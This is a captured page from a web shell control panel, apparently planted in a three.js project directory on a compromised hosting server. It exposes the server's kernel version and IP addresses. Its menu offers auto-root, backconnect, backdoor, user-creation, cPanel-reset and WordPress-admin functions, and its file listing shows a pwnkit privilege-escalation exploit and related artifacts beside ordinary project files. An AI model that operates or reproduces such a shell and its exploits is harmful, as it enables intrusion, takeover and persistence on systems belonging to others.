Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.128.202.43
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
HRD-Test /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
playground
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.editorconfig
187
B
-rw-r--r--
.eslintrc.json
1.15
KB
-rw-r--r--
.gitattributes
86
B
-rw-r--r--
.gitignore
280
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
LICENSE
1.06
KB
-rw-r--r--
README.md
2.92
KB
-rw-r--r--
SECURITY.md
801
B
-rw-r--r--
icon.png
7.39
KB
-rw-r--r--
package-lock.json
265.91
KB
-rw-r--r--
package.json
3.76
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .eslintrc.json
{ "root": true, "env": { "browser": true, "node": true, "es2018": true }, "parserOptions": { "ecmaVersion": 2018, "sourceType": "module" }, "extends": [ "mdcs", "plugin:compat/recommended" ], "plugins": [ "html", "import" ], "settings": { "polyfills": [ "WebGL2RenderingContext" ] }, "globals": { "__THREE_DEVTOOLS__": "readonly", "potpack": "readonly", "fflate": "readonly", "Stats": "readonly", "XRWebGLBinding": "readonly", "XRWebGLLayer": "readonly", "GPUShaderStage": "readonly", "GPUBufferUsage": "readonly", "GPUTextureUsage": "readonly", "GPUTexture": "readonly", "GPUMapMode": "readonly", "QUnit": "readonly", "Ammo": "readonly", "XRRigidTransform": "readonly", "XRMediaBinding": "readonly", "CodeMirror": "readonly", "esprima": "readonly", "jsonlint": "readonly" }, "rules": { "no-throw-literal": [ "error" ], "quotes": [ "error", "single" ], "prefer-const": [ "error", { "destructuring": "any", "ignoreReadBeforeAssign": false } ] } }
Close